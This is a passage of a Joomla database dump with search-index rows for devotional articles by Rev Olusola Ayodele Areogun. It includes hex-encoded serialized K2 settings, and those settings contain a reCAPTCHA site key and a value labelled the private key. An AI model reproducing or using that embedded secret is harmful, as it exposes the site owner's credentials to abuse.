'b3960836fb4bc0331fa542f41aa8ba03', 1, 0, 1, '*', '2014-07-26 00:00:00', '0000-00-00 00:00:00', '2014-07-26 00:00:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a313a2236223b733a353a22616c696173223b733a32383a22796f752d6f6e6c792d6c6976652d6f6e63652d6c6976652d77656c6c223b733a373a2273756d6d617279223b733a3839373a223c703e3c6272202f3e205b766964656f2077696474683d223130302522206865696768743d223432302220706f737465723d22696d616765732f64656d6f2f766964656f2f6d6f7669655f62672e706e67225d205b736f7572636520747970653d22766964656f2f6d7034222075726c3d22696d616765732f64656d6f2f766964656f2f656e7661746f5f7374696e672e6d7034225d5b2f736f757263655d205b736f7572636520747970653d22766964656f2f6f6767222075726c3d22696d616765732f64656d6f2f766964656f2f656e7661746f5f7374696e672e6f6776225d5b2f736f757263655d205b736f7572636520747970653d22766964656f2f7765626d222075726c3d22696d616765732f64656d6f2f766964656f2f656e7661746f5f7374696e672e7765626d225d5b2f736f757263655d205b2f766964656f5d3c2f703e0d0a3c7020636c6173733d2264726f70636170223e506572686170732074726176656c2063616e6e6f742070726576656e74206269676f7472792c206275742062792064656d6f6e7374726174696e67207468617420616c6c2070656f706c6573206372792c206c617567682c206561742c20776f7272792c20616e64206469652c2069742063616e20696e74726f6475636520746865206964656120746861742069662077652074727920616e6420756e6465727374616e642065616368206f746865722c207765206d6179206576656e206265636f6d6520667269656e64732e3c2f703e0d0a3c703e446f6e277420676f2061726f756e6420736179696e672074686520776f726c64206f77657320796f752061206c6976696e672e2054686520776f726c64206f77657320796f75206e6f7468696e672e2049742077617320686572652066697273742e20496620796f7520646f6e2774206c696b6520736f6d657468696e672c206368616e67652069742e20496620796f752063616e2774206368616e67652069742c206368616e676520796f75722061747469747564652e204368616e67652077696c6c206e6f7420636f6d65206966207765207761697420666f7220736f6d65206f7468657220706572736f6e206f7220736f6d65206f746865722074696d652e2057652061726520746865206f6e6573207765277665206265656e2077616974696e6720666f722e2057652061726520746865206368616e67652074686174207765207365656b2e3c2f703e0d0a223b733a343a22626f6479223b733a3736393a220d0a3c703e4974206973206e6f7420746865207374726f6e67657374206f6620746865207370656369657320746861742073757276697665732c206e6f7220746865206d6f737420696e74656c6c6967656e7420746861742073757276697665732e20497420697320746865206f6e65207468617420697320746865206d6f737420616461707461626c6520746f206368616e67652e20416c6c206368616e6765732c206576656e20746865206d6f7374206c6f6e67656420666f722c2068617665207468656972206d656c616e63686f6c793b20666f722077686174207765206c6561766520626568696e6420757320697320612070617274206f66206f757273656c7665733b207765206d7573742064696520746f206f6e65206c696665206265666f72652077652063616e20656e74657220616e6f746865722e3c2f703e0d0a3c703e5b626c6f636b71756f746520617574686f723d22756e6b6e6f776e225d2042656c6965766520696e20796f757273656c6621204861766520666169746820696e20796f7572206162696c69746965732120576974686f757420612068756d626c652062757420726561736f6e61626c6520636f6e666964656e636520696e20796f7572206f776e20706f7765727320796f752063616e6e6f74206265207375636365737366756c206f722068617070792e205b2f626c6f636b71756f74655d3c2f703e0d0a3c703e54616b65207570206f6e6520696465612e204d616b652074686174206f6e65206964656120796f7572206c696665202d207468696e6b206f662069742c20647265616d206f662069742c206c697665206f6e207468617420696465612e204c65742074686520627261696e2c206d7573636c65732c206e65727665732c2065766572792070617274206f6620796f757220626f64792c2062652066756c6c206f66207468617420696465612c20616e64206a757374206c65617665206576657279206f74686572206964656120616c6f6e652e2054686973206973207468652077617920746f20737563636573732e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031362d31322d33312031383a35343a3230223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2232223b733a353a227472617368223b733a313a2231223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33303a22363a796f752d6f6e6c792d6c6976652d6f6e63652d6c6976652d77656c6c223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34383a22636f6d706f6e656e742f6b322f6974656d2f362d796f752d6f6e6c792d6c6976652d6f6e63652d6c6976652d77656c6c223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d36223b733a353a22726f757465223b733a36373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d363a796f752d6f6e6c792d6c6976652d6f6e63652d6c6976652d77656c6c223b733a353a227469746c65223b733a33303a22596f75206f6e6c79206c697665206f6e6365202d204c6976652077656c6c223b733a31313a226465736372697074696f6e223b733a3835313a22205b766964656f2077696474683d223130302522206865696768743d223432302220706f737465723d22696d616765732f64656d6f2f766964656f2f6d6f7669655f62672e706e67225d205b736f7572636520747970653d22766964656f2f6d7034222075726c3d22696d616765732f64656d6f2f766964656f2f656e7661746f5f7374696e672e6d7034225d5b2f736f757263655d205b736f7572636520747970653d22766964656f2f6f6767222075726c3d22696d616765732f64656d6f2f766964656f2f656e7661746f5f7374696e672e6f6776225d5b2f736f757263655d205b736f7572636520747970653d22766964656f2f7765626d222075726c3d22696d616765732f64656d6f2f766964656f2f656e7661746f5f7374696e672e7765626d225d5b2f736f757263655d205b2f766964656f5d20506572686170732074726176656c2063616e6e6f742070726576656e74206269676f7472792c206275742062792064656d6f6e7374726174696e67207468617420616c6c2070656f706c6573206372792c206c617567682c206561742c20776f7272792c20616e64206469652c2069742063616e20696e74726f6475636520746865206964656120746861742069662077652074727920616e6420756e6465727374616e642065616368206f746865722c207765206d6179206576656e206265636f6d6520667269656e64732e20446f6e277420676f2061726f756e6420736179696e672074686520776f726c64206f77657320796f752061206c6976696e672e2054686520776f726c64206f77657320796f75206e6f7468696e672e2049742077617320686572652066697273742e20496620796f7520646f6e2774206c696b6520736f6d657468696e672c206368616e67652069742e20496620796f752063616e2774206368616e67652069742c206368616e676520796f75722061747469747564652e204368616e67652077696c6c206e6f7420636f6d65206966207765207761697420666f7220736f6d65206f7468657220706572736f6e206f7220736f6d65206f746865722074696d652e2057652061726520746865206f6e6573207765277665206265656e2077616974696e6720666f722e2057652061726520746865206368616e67652074686174207765207365656b2e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a303b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031342d30372d32362030303a30303a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031342d30372d32362030303a30303a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(252, 'index.php?option=com_k2&view=item&id=7', 'index.php?option=com_k2&view=item&id=7:patience', 'Patience with Divine Working', ' There is a patience that we need with God. God requires constancy in what you are doing for Him. Impatience disrupts the work of God in the lives of his people.Impatience can cause a person to make avoidable mistakes. There is a patience that we must allow for God to do all that He intends to do in us, with us and through us. You can’t write all the books that God has placed in your spirit in one year; that is not possible so you need to exercise patience. ', '2017-06-25 14:19:29', '59778bd7d9b0ea4983c7955ab490ce9d', 1, 1, 1, '*', '2016-12-30 00:00:00', '0000-00-00 00:00:00', '2016-12-30 00:00:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a313a2237223b733a353a22616c696173223b733a383a2270617469656e6365223b733a373a2273756d6d617279223b733a3438333a223c703ec2a03c2f703e0d0a3c703e546865726520697320612070617469656e63652074686174207765206e656564207769746820476f642e20476f6420726571756972657320636f6e7374616e637920696e207768617420796f752061726520646f696e6720666f722048696d2ec2a0496d70617469656e63652064697372757074732074686520776f726b206f6620476f6420696e20746865206c69766573206f66206869732070656f706c652e496d70617469656e63652063616e206361757365206120706572736f6e20746f206d616b652061766f696461626c65206d697374616b65732e20546865726520697320612070617469656e63652074686174207765206d75737420616c6c6f7720666f7220476f6420746f20646f20616c6c207468617420486520696e74656e647320746f20646f20696e2075732c207769746820757320616e64207468726f7567682075732e20596f752063616ee280997420777269746520616c6c2074686520626f6f6b73207468617420476f642068617320706c6163656420696e20796f75722073706972697420696e206f6e6520796561723b2074686174206973206e6f7420706f737369626c6520736f20796f75206e65656420746f2065786572636973652070617469656e63652e3c2f703e0d0a223b733a343a22626f6479223b733a313837323a220d0a3c703ec2a054686572652061726520736f6d65207468696e6773207468617420492062656c6965766520796f752064696420666976652079656172732061676f2c207468617420696620796f752077696c6c20646f207468656d206e6f772c206d6f7374206c696b656c7920796f752077696c6c20646f207468656d206265747465722e2054686572652061726520736f6d65206f662074686520626f6f6b73207468617420492068617665207772697474656e2074686174206e6f77207768656e20492072656164207468656d2c20492077616e7420746f2072652d7772697465207468656d2e204a7573742061732070656f706c65206d75737420626520706174